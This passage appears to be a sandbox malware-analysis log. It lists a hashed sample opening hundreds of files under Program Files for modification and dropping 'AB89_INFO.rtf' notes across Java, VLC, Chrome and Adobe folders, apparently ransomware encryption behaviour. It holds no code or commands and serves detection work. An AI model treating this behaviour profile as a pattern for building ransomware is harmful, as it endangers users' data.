Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.xml_1.3.4.v201005080400.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.h 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\TestUnpublish.sys 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql90.xsl 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Toronto 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.zh_CN_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\es.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Troll 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\modules\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\new-trigger-wiz.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\accessibility.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+11 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_gtk.css 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\javaws.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Anchorage 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.json 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_preferencestyle.css 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\InstallUndo.mhtml 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Khandyga 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\about.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\Documentation.url 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Gambier 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Vincennes 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\SmallLogoCanary.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\WidevineCdm\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\kinit.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\sysinfo.bat 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\pack200.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_ja.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-windows_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Qatar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mru_on_win7.css 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jawt_md.h 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Nairobi 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_TW.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-coredump.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Lindeman 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\SendMail.api 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\sound.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\toc.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-visual.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+12 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\fa.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Tallinn 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\jquery.jstree.js 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\policytool.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Brisbane 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\native2ascii.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.ja_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh89 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\index.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\sw.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dataset.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\epl-v10.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_it.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-modules_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Auckland 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Guadalcanal 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\precomplete 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher_1.1.0.v20131211-1531.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-io_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\COPYING.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\time-span-16.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\dsn.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Rangoon 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\America\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\AUTHORS.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-11 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kabul 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Cocos 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore.change_2.10.0.v20140901-1043.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\Louisville 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mac.css 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cancun 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240811.profile.gz 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Port_Moresby 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\ZoneInfoMappings 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Sao_Paulo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Copenhagen 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\klist.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Metlakatla 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.clusters 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cuiaba 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Kaliningrad 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\http\js\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\apt.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-1 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Tijuana 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\MEIPreload\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kathmandu 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\wsgen.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jvmti.h 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST7MDT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\stream_window.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.SYD 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prcr.x3d 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Thule 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\javaw.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\MST7 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\twitch.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Havana 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\jfluid-server.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\et.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-text.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.SF 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ext_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\high-contrast.css 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\sa-jdi.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\San_Juan 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tarawa 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javac.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Sofia 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Lisbon 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\San_Luis 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\DVA.api 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\klist.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\flavormap.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jmap.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\keytool.exe 